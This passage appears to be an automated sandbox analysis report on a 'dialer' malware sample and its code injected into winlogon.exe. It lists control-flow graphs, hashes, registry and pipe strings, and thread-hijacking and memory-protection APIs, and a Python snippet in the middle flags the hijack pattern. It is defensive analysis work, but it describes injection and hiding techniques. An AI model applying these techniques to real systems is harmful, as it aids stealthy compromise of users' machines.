• Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
Similarity
• API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
• String ID: @
• API String ID: 3462610200-2766056989
• Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
• Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
• Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
• Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
Similarity
• API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
• String ID: dialersvc64
• API String ID: 4184240511-3881820561
• Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
• Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
• Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
• Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
APIs
Strings
Memory Dump Source
• Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
Similarity
• API ID: Delete$CloseEnumOpen
• String ID: SOFTWARE\dialerconfig
• API String ID: 3013565938-461861421
• Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
• Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
• Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
• Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
APIs
Strings
Memory Dump Source
• Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
Similarity
• API ID: File$Write$CloseCreateHandle
• String ID: \\.\pipe\dialercontrol_redirect64
• API String ID: 148219782-3440882674
• Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
• Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
• Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
• Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
APIs
Strings
Memory Dump Source
• Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: ntdll.dll
• API String ID: 1646373207-2227199552
• Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
• Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
• Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
• Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

Execution Graph

Execution Coverage: 1.3%
Dynamic/Decrypted Code Coverage: 94.4%
Signature Coverage: 0%
Total number of Nodes: 107
Total number of Limit Nodes: 16
• Graph rendering not reproduced (graph data is truncated in the source); APIs in graph: SetThreadContext, VirtualProtect, FlushInstructionCache, VirtualFree, GetCurrentProcess, ResumeThread, IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, VirtualAlloc, LoadLibraryA, StrCmpNIW, VirtualQuery, GetLastError, GetProcessHeap, Sleep, SleepEx, StrCmpIW, StrCmpW
1e858981648 __free_lconv_mon 22271->22272 22317 1e858981268 GetProcessHeap 22272->22317 22274 1e858981650 22275 1e858981268 2 API calls 22274->22275 22276 1e858981661 22275->22276 22277 1e858981268 2 API calls 22276->22277 22278 1e85898166a 22277->22278 22279 1e858981268 2 API calls 22278->22279 22280 1e858981673 22279->22280 22281 1e85898168e RegOpenKeyExW 22280->22281 22282 1e8589816c0 RegOpenKeyExW 22281->22282 22283 1e8589818a6 22281->22283 22284 1e8589816e9 22282->22284 22285 1e8589816ff RegOpenKeyExW 22282->22285 22283->22269 22328 1e8589812bc 11 API calls __free_lconv_mon 22284->22328 22287 1e858981723 22285->22287 22288 1e85898173a RegOpenKeyExW 22285->22288 22321 1e85898104c RegQueryInfoKeyW 22287->22321 22290 1e858981775 RegOpenKeyExW 22288->22290 22291 1e85898175e 22288->22291 22295 1e8589817b0 RegOpenKeyExW 22290->22295 22296 1e858981799 22290->22296 22329 1e8589812bc 11 API calls __free_lconv_mon 22291->22329 22292 1e8589816f5 RegCloseKey 22292->22285 22299 1e8589817d4 22295->22299 22300 1e8589817eb RegOpenKeyExW 22295->22300 22330 1e8589812bc 11 API calls __free_lconv_mon 22296->22330 22297 1e85898176b RegCloseKey 22297->22290 22331 1e8589812bc 11 API calls __free_lconv_mon 22299->22331 22303 1e858981826 RegOpenKeyExW 22300->22303 22304 1e85898180f 22300->22304 22301 1e8589817a6 RegCloseKey 22301->22295 22306 1e858981861 RegOpenKeyExW 22303->22306 22307 1e85898184a 22303->22307 22305 1e85898104c 4 API calls 22304->22305 22309 1e85898181c RegCloseKey 22305->22309 22311 1e858981885 22306->22311 22312 1e85898189c RegCloseKey 22306->22312 22310 1e85898104c 4 API calls 22307->22310 22308 1e8589817e1 RegCloseKey 22308->22300 22309->22303 22313 1e858981857 RegCloseKey 22310->22313 22314 1e85898104c 4 API calls 22311->22314 22312->22283 22313->22306 22315 1e858981892 RegCloseKey 22314->22315 22315->22312 22332 1e858996168 22317->22332 22319 1e858981283 GetProcessHeap 22320 1e8589812ae __free_lconv_mon 22319->22320 22320->22274 22322 1e8589811b5 RegCloseKey 
22321->22322 22323 1e8589810bf 22321->22323 22322->22288 22323->22322 22324 1e8589810cf RegEnumValueW 22323->22324 22326 1e858981125 __free_lconv_mon 22324->22326 22325 1e85898114e GetProcessHeap 22325->22326 22326->22322 22326->22324 22326->22325 22327 1e85898116e GetProcessHeap 22326->22327 22327->22326 22328->22292 22329->22297 22330->22301 22331->22308 22333 1e85898554d 22335 1e858985554 22333->22335 22334 1e8589855bb 22335->22334 22336 1e858985637 VirtualProtect 22335->22336 22337 1e858985671 22336->22337 22338 1e858985663 GetLastError 22336->22338 22338->22337 22339 1e8589b273c 22340 1e8589b276a 22339->22340 22341 1e8589b27c5 VirtualAlloc 22340->22341 22342 1e8589b27ec 22340->22342 22341->22342
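The execution graph above is printed as one edge list (node id, address, optional API labels, then `A->B` edges), wrapped mid-record by the report renderer. The following Python is an added example, not Joe Sandbox tooling: it tokenises that text, rebuilds the node and edge tables, and lists the Win32 APIs reachable from the function entry so the SetThreadContext / VirtualProtect / FlushInstructionCache / ResumeThread shape of the winlogon.exe code can be read off without tracing edge numbers by hand. The grammar is inferred from the printed text, the "CamelCase means API export" rule is a heuristic that deliberately drops compiler helpers such as `capture_previous_context`, and the embedded excerpt is nodes 22222-22245 copied from this report.

```python
"""Parse a Joe Sandbox execution_graph line and pull the Win32 API chain out of
it.  Added example, not Joe Sandbox code; grammar inferred from the report text."""
import re
from collections import defaultdict, deque
from typing import Dict, List, Set, Tuple

# Excerpt of the winlogon.exe execution graph from this report (nodes 22222-22245).
# The report prints the whole graph on one line; it is wrapped here for readability.
GRAPH_TEXT = (
    "execution_graph 22222 1e858985cf0 22223 1e858985cfd 22222->22223 "
    "22224 1e858985d09 22223->22224 22232 1e858985e1a 22223->22232 "
    "22225 1e858985d3e 22224->22225 22226 1e858985d8d 22224->22226 "
    "22227 1e858985d66 SetThreadContext 22225->22227 22227->22226 "
    "22228 1e858985e41 VirtualProtect FlushInstructionCache 22228->22232 "
    "22229 1e858985efe 22230 1e858985f1e 22229->22230 "
    "22244 1e8589843e0 VirtualFree 22229->22244 "
    "22240 1e858984df0 GetCurrentProcess 22230->22240 22232->22228 22232->22229 "
    "22234 1e858985f23 22235 1e858985f77 22234->22235 "
    "22236 1e858985f37 ResumeThread 22234->22236 "
    "22245 1e858987940 IsProcessorFeaturePresent RtlCaptureContext "
    "RtlLookupFunctionEntry capture_previous_context 22235->22245 "
    "22237 1e858985f6b 22236->22237 22237->22234 22239 1e858985fbf "
    "22243 1e858984e0c 22240->22243 "
    "22241 1e858984e22 VirtualProtect FlushInstructionCache 22241->22243 "
    "22242 1e858984e53 22242->22234 22243->22241 22243->22242 22244->22230 22245->22239"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^[0-9a-fA-F]{8,16}$")
# Heuristic: Win32 exports are CamelCase; helpers such as __free_lconv_mon or
# capture_previous_context are not and are kept as plain labels only.
API_RE = re.compile(r"^[A-Z][A-Za-z0-9]+$")

Node = Tuple[str, List[str]]  # (address, labels)


def parse_graph(text: str) -> Tuple[Dict[int, Node], Dict[int, List[int]]]:
    """Tokenise 'ID ADDR label... ID->ID ...' into node and edge tables."""
    tokens = text.split()  # whitespace split also heals the mid-record line wraps
    if tokens and tokens[0] == "execution_graph":
        tokens = tokens[1:]
    nodes: Dict[int, Node] = {}
    edges: Dict[int, List[int]] = defaultdict(list)
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges[int(edge.group(1))].append(int(edge.group(2)))
            i += 1
            continue
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if tok.isdigit() and len(tok) < 8 and ADDR_RE.match(nxt):
            current = int(tok)  # e.g. "22227 1e858985d66" starts a node
            nodes[current] = (nxt, [])
            i += 2
            continue
        if current is None:
            raise ValueError(f"label {tok!r} before any node")
        if tok.isdigit() and tokens[i + 1:i + 3] == ["API", "calls"]:
            # Folded subcall summary such as "9 API calls": keep as one label.
            nodes[current][1].append(" ".join(tokens[i:i + 3]))
            i += 3
            continue
        nodes[current][1].append(tok)
        i += 1
    return nodes, dict(edges)


def roots(nodes: Dict[int, Node], edges: Dict[int, List[int]]) -> List[int]:
    """Nodes with no incoming edge: the function entry points in the graph."""
    targets = {dst for dsts in edges.values() for dst in dsts}
    return sorted(n for n in nodes if n not in targets)


def reachable_apis(nodes: Dict[int, Node], edges: Dict[int, List[int]], root: int) -> List[str]:
    """API names reachable from root in BFS discovery order; cycles are safe."""
    seen: Set[int] = {root}
    queue = deque([root])
    apis: List[str] = []
    while queue:
        n = queue.popleft()
        for label in nodes.get(n, ("", []))[1]:
            if API_RE.match(label) and label not in apis:
                apis.append(label)
        for dst in edges.get(n, []):
            if dst not in seen:
                seen.add(dst)
                queue.append(dst)
    return apis


HIJACK_APIS = {"SetThreadContext", "VirtualProtect", "FlushInstructionCache", "ResumeThread"}


def thread_hijack_indicator(apis: List[str]) -> bool:
    """True when one function can rewrite code, repoint a thread and resume it."""
    return HIJACK_APIS.issubset(apis)


def summarise(text: str) -> Dict[int, List[str]]:
    nodes, edges = parse_graph(text)
    return {r: reachable_apis(nodes, edges, r) for r in roots(nodes, edges)}


if __name__ == "__main__":
    for root, apis in summarise(GRAPH_TEXT).items():
        flag = "  <- thread context hijack shape" if thread_hijack_indicator(apis) else ""
        print(f"{root}: {' -> '.join(apis)}{flag}")
```

The result is a reachability set, not an executed trace: the graph is cut at its limit nodes (the SetThreadContext branch dead-ends at node 22226 in the excerpt), so a single simple path never holds all four APIs and the indicator is deliberately computed over everything reachable from the entry. Run the same parser over the full `execution_graph` line of a report to get one API summary per root function.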

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                          • API String ID: 106492572-2879589442
                                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction ID: 21d86d412d1650ae27b0043b2d401094e46d8c624b6cd0b43ec9435d42789ffa
                                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction Fuzzy Hash: 2D710A36321A91C6EB10AF66E8916EDB3A5FF84B98F401132DE4E57B69EF38C454C740

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                          • String ID: wr
                                                                          • API String ID: 1092925422-2678910430
                                                                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction ID: d234e4461be7ce666b4697da3425b0a366aa51e2e4cc7be98c343ce9cae75724
                                                                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction Fuzzy Hash: 05115B36724BC1C2EF159B22E4086ADB2A1FB88B85F44003ADE8E07794EF3DC505CB04

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 59 1e858985b30-1e858985b57 60 1e858985b59-1e858985b68 59->60 61 1e858985b6b-1e858985b76 GetCurrentThreadId 59->61 60->61 62 1e858985b82-1e858985b89 61->62 63 1e858985b78-1e858985b7d 61->63 65 1e858985b9b-1e858985baf 62->65 66 1e858985b8b-1e858985b96 call 1e858985960 62->66 64 1e858985faf-1e858985fc6 call 1e858987940 63->64 69 1e858985bbe-1e858985bc4 65->69 66->64 72 1e858985c95-1e858985cb6 69->72 73 1e858985bca-1e858985bd3 69->73 77 1e858985cbc-1e858985cdc GetThreadContext 72->77 78 1e858985e1f-1e858985e30 call 1e8589874bf 72->78 75 1e858985bd5-1e858985c18 call 1e8589885c0 73->75 76 1e858985c1a-1e858985c8d call 1e858984510 call 1e8589844b0 call 1e858984470 73->76 88 1e858985c90 75->88 76->88 81 1e858985ce2-1e858985d03 77->81 82 1e858985e1a 77->82 93 1e858985e35-1e858985e3b 78->93 81->82 91 1e858985d09-1e858985d12 81->91 82->78 88->69 95 1e858985d92-1e858985da3 91->95 96 1e858985d14-1e858985d25 91->96 97 1e858985e41-1e858985e98 VirtualProtect FlushInstructionCache 93->97 98 1e858985efe-1e858985f0e 93->98 99 1e858985e15 95->99 100 1e858985da5-1e858985dc3 95->100 102 1e858985d27-1e858985d3c 96->102 103 1e858985d8d 96->103 106 1e858985ec9-1e858985ef9 call 1e8589878ac 97->106 107 1e858985e9a-1e858985ea4 97->107 104 1e858985f10-1e858985f17 98->104 105 1e858985f1e-1e858985f2a call 1e858984df0 98->105 100->99 108 1e858985dc5-1e858985e0c call 1e858983900 100->108 102->103 110 1e858985d3e-1e858985d88 call 1e858983970 SetThreadContext 102->110 103->99 104->105 111 1e858985f19 call 1e8589843e0 104->111 122 1e858985f2f-1e858985f35 105->122 106->93 107->106 113 1e858985ea6-1e858985ec1 call 1e858984390 107->113 108->99 124 1e858985e10 call 1e8589874dd 108->124 110->103 111->105 113->106 125 1e858985f77-1e858985f95 122->125 126 1e858985f37-1e858985f75 ResumeThread call 1e8589878ac 122->126 124->99 128 1e858985f97-1e858985fa6 125->128 129 1e858985fa9 125->129 126->122 128->129 129->64
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$Current$Context
                                                                          • String ID:
                                                                          • API String ID: 1666949209-0
                                                                          • Opcode ID: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                                          • Instruction ID: a4617b46cd32b3a0414ab7f2d2c5e1ab313b6a71b2cba704dad36ec99b28e09a
                                                                          • Opcode Fuzzy Hash: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                                          • Instruction Fuzzy Hash: 9DD17776214B89C6DB709B56E49439EB7A0FB88B84F500126EE8D47BA9DF3CC545CF40

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 131 1e8589850d0-1e8589850fc 132 1e85898510d-1e858985116 131->132 133 1e8589850fe-1e858985106 131->133 134 1e858985127-1e858985130 132->134 135 1e858985118-1e858985120 132->135 133->132 136 1e858985141-1e85898514a 134->136 137 1e858985132-1e85898513a 134->137 135->134 138 1e858985156-1e858985161 GetCurrentThreadId 136->138 139 1e85898514c-1e858985151 136->139 137->136 141 1e858985163-1e858985168 138->141 142 1e85898516d-1e858985174 138->142 140 1e8589856d3-1e8589856da 139->140 141->140 143 1e858985181-1e85898518a 142->143 144 1e858985176-1e85898517c 142->144 145 1e858985196-1e8589851a2 143->145 146 1e85898518c-1e858985191 143->146 144->140 147 1e8589851a4-1e8589851c9 145->147 148 1e8589851ce-1e858985225 call 1e8589856e0 * 2 145->148 146->140 147->140 153 1e858985227-1e85898522e 148->153 154 1e85898523a-1e858985243 148->154 155 1e858985230 153->155 156 1e858985236 153->156 157 1e858985255-1e85898525e 154->157 158 1e858985245-1e858985252 154->158 159 1e8589852b0-1e8589852b6 155->159 160 1e8589852a6-1e8589852aa 156->160 161 1e858985260-1e858985270 157->161 162 1e858985273-1e858985298 call 1e858987870 157->162 158->157 163 1e8589852e5-1e8589852eb 159->163 164 1e8589852b8-1e8589852d4 call 1e858984390 159->164 160->159 161->162 172 1e85898532d-1e858985342 call 1e858983cc0 162->172 173 1e85898529e 162->173 167 1e858985315-1e858985328 163->167 168 1e8589852ed-1e85898530c call 1e8589878ac 163->168 164->163 174 1e8589852d6-1e8589852de 164->174 167->140 168->167 178 1e858985351-1e85898535a 172->178 179 1e858985344-1e85898534c 172->179 173->160 174->163 180 1e85898536c-1e8589853ba call 1e858988c60 178->180 181 1e85898535c-1e858985369 178->181 179->160 184 1e8589853c2-1e8589853ca 180->184 181->180 185 1e8589853d0-1e8589854bb call 1e858987440 184->185 186 1e8589854d7-1e8589854df 184->186 198 1e8589854bd 185->198 199 1e8589854bf-1e8589854ce call 1e858984060 185->199 188 
1e8589854e1-1e8589854f4 call 1e858984590 186->188 189 1e858985523-1e85898552b 186->189 200 1e8589854f6 188->200 201 1e8589854f8-1e858985521 188->201 190 1e858985537-1e858985546 189->190 191 1e85898552d-1e858985535 189->191 196 1e858985548 190->196 197 1e85898554f 190->197 191->190 195 1e858985554-1e858985561 191->195 203 1e858985563 195->203 204 1e858985564-1e8589855b9 call 1e8589885c0 195->204 196->197 197->195 198->186 207 1e8589854d0 199->207 208 1e8589854d2 199->208 200->189 201->186 203->204 210 1e8589855c8-1e858985661 call 1e858984510 call 1e858984470 VirtualProtect 204->210 211 1e8589855bb-1e8589855c3 204->211 207->186 208->184 216 1e858985671-1e8589856d1 210->216 217 1e858985663-1e858985668 GetLastError 210->217 216->140 217->216
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                                          • Instruction ID: fa7807662b3792369c97fc6f37bebb2b001074cd7c6065ce50333d33d1213250
                                                                          • Opcode Fuzzy Hash: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                                          • Instruction Fuzzy Hash: 11029436229BC5C6EB60CB59E49079EB7A1F785794F104026EA8E87BA9DF7CC454CF00

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$AllocQuery
                                                                          • String ID:
                                                                          • API String ID: 31662377-0
                                                                          • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                          • Instruction ID: 5ad133b89d074dd97bec0c1f73fb02c24c1f243091b434175b3c7d6c02ead25a
                                                                          • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                          • Instruction Fuzzy Hash: E531EC32239AC5C1EA70DA15E85539EF6A4FB88784F500536EACE46BA8DF7DC5809F04

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                          • String ID:
                                                                          • API String ID: 1683269324-0
                                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction ID: 9367effade6da1e612e9811c82477e14b03a08a888ac1948d4cbee7ffa7af72d
                                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction Fuzzy Hash: F41152716346C2C2FB60AB62F8493DDF294BF54385F90413FAD4E82995EF7CC0849A10

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 3733156554-0
                                                                          • Opcode ID: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                                          • Instruction ID: 5a9e8cf37d9f90f00b28642c3c3ed99c7679eb8f6b8d0d5ae9ec7e4d6c0d13b2
                                                                          • Opcode Fuzzy Hash: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                                          • Instruction Fuzzy Hash: DFF01D76228B85C1D630DB51E44038EBBA0FB887D4F140122BE8D43B69CE3CC5808F00

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 265 1e85895273c-1e8589527a4 call 1e8589529d4 * 4 274 1e8589527aa-1e8589527ad 265->274 275 1e8589529b2 265->275 274->275 276 1e8589527b3-1e8589527b6 274->276 277 1e8589529b4-1e8589529d0 275->277 276->275 278 1e8589527bc-1e8589527bf 276->278 278->275 279 1e8589527c5-1e8589527e6 VirtualAlloc 278->279 279->275 280 1e8589527ec-1e85895280c 279->280 281 1e85895280e-1e858952836 280->281 282 1e858952838-1e85895283f 280->282 281->281 281->282 283 1e8589528df-1e8589528e6 282->283 284 1e858952845-1e858952852 282->284 285 1e8589528ec-1e858952901 283->285 286 1e858952992-1e8589529b0 283->286 284->283 287 1e858952858-1e85895286a LoadLibraryA 284->287 285->286 288 1e858952907 285->288 286->277 289 1e85895286c-1e858952878 287->289 290 1e8589528ca-1e8589528d2 287->290 293 1e85895290d-1e858952921 288->293 294 1e8589528c5-1e8589528c8 289->294 290->287 291 1e8589528d4-1e8589528d9 290->291 291->283 296 1e858952923-1e858952934 293->296 297 1e858952982-1e85895298c 293->297 294->290 295 1e85895287a-1e85895287d 294->295 301 1e85895287f-1e8589528a5 295->301 302 1e8589528a7-1e8589528b7 295->302 299 1e85895293f-1e858952943 296->299 300 1e858952936-1e85895293d 296->300 297->286 297->293 304 1e85895294d-1e858952951 299->304 305 1e858952945-1e85895294b 299->305 303 1e858952970-1e858952980 300->303 306 1e8589528ba-1e8589528c1 301->306 302->306 303->296 303->297 308 1e858952963-1e858952967 304->308 309 1e858952953-1e858952961 304->309 305->303 306->294 308->303 310 1e858952969-1e85895296c 308->310 309->303 310->303
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284181890.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: AllocLibraryLoadVirtual
                                                                          • String ID:
                                                                          • API String ID: 3550616410-0
                                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction ID: 664efa2306450b3d651c980b7901db96b5cccce9d6076fff7dea8f6b8d110b4a
                                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction Fuzzy Hash: 3261CC72B21690C7DA548F95D1207ADF3A2FF54BA5F588132DE5D07788DE38D852C700

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 000001E858981628: GetProcessHeap.KERNEL32 ref: 000001E858981633
                                                                            • Part of subcall function 000001E858981628: HeapAlloc.KERNEL32 ref: 000001E858981642
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589816B2
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589816DF
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589816F9
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981719
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E858981734
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981754
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E85898176F
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E85898178F
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589817AA
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589817CA
                                                                          • Sleep.KERNEL32 ref: 000001E858981AD7
                                                                          • SleepEx.KERNELBASE ref: 000001E858981ADD
